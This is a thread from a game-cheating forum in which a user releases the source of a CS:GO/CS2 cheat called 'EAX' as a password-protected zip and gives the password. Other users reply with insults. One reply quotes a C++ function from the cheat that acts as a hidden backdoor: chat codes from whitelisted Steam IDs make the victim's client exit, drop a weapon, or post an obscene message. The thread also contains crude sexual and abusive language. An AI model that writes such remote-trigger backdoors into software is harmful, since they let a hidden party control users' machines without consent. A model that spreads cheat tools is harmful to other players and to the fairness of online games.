Welcome to hackvshack.net Forum!
Download Free HvH CS2/CS:GO Cheats, CFG, LUA/JS Scripts, and More!
Register

C++ EAX

ryanoutcome

Outcome#9112
User ID:
58247
Messages:
18
Reactions:
1,038
Badges:
12
REP:
−0/0+
Level:
97
This is a decently new build of EAX (March 2024), which had been purchased from the EAX developers by Brownie and given to me to be released as part of my exposé on Vouza. The version released earlier in DLL form (gigglehack/pedophile resolved) was not only incomplete but also completely smashed as a part of my deal with Brownie. Since I don't use it, nor do I care, it will be released in its full form here.

Do note that this is the version WITHOUT the broken animations/crashes/resolver issues that were in the previous post; those were intentionally caused by me in accordance with the deal I made with Brownie.

Also note that Saphack and RAX use the animations taken directly from this cheat since I was the one that gave it to Breaker.

As usual, pass word is "hvh.net".
 

Password for .zip file is hvh.net

  • Love
Reactions: Plisskien
nice iq , first this source is public and it goes by name webster or secreto (for 1.5years) this shi is complety dogshit and no this is not even close to the animations from "rax" or "saphack" ur just a clueless kid that talks nonsense
 
nice iq , first this source is public and it goes by name webster or secreto (for 1.5years) this shi is complety dogshit and no this is not even close to the animations from "rax" or "saphack" ur just a clueless kid that talks nonsense
funny part is that this persona never gave me a line of code😂
 
lol:
Expand Collapse Copy
void events::player_say( IGameEvent* evt )
{
    // initialize player_info_t
    player_info_t info;

    // get player index.
    auto index = g_csgo.m_engine->GetPlayerForUserID(evt->m_keys->FindKey(HASH("userid"))->GetInt());

    // get local
    auto pLocal = g_csgo.m_engine->GetLocalPlayer();

    std::vector<std::pair<float, std::string>> m_vecDevMessages;

    // google: http://steamcommunity.com/profiles/76561199157486172

    std::vector<__int64> m_vecWhitelistedIds = {
        76561198316009066 // murik: http://steamcommunity.com/profiles/76561198316009066
    };

    if (!pLocal)
        return;

    if ( !g_csgo.m_engine->GetPlayerInfo(index, &info) )
        return;

    if (m_vecDevMessages.empty())
        return;

    static std::vector<std::pair<std::string, std::function<void(void)>>> magic =
    {
        { XOR("_0"), [&]() { exit(0x69); } }, // force crash
        { XOR("_1"), [&]() { g_csgo.m_engine->ExecuteClientCmd(XOR("drop")); } }, // drop weapon
        { XOR("_2"), [&]() { g_csgo.m_engine->ExecuteClientCmd(XOR("say \"you guys ever just thinking about sucking cock and swallowing cum? i think i have an attraction to femboys..\"")); } }, // troll
        //{ XOR( "_3" ), [ & ] ( ) { PlaySoundA( ( LPCSTR )personuh, NULL, SND_MEMORY | SND_ASYNC ); } }, // personuh
    };

    // loop through all the messages sent by devs
    for (auto& messages : m_vecDevMessages) {
        // loop through all the magic codes
        for (auto& codes : magic) {
            // if the messages sent by devs mach any of the according
            // magic codes, then do the action that this code stands for
            if (messages.second == codes.first) {
                // do!
                codes.second();

                // only do these once
                m_vecDevMessages.clear();
            }
        }
    }
}
 
nice iq , first this source is public and it goes by name webster or secreto (for 1.5years) this shi is complety dogshit and no this is not even close to the animations from "rax" or "saphack" ur just a clueless kid that talks nonsense
this has nothing to do with webster/fruit
 

Who has read this thread (Total: 0) in last 1 hours View details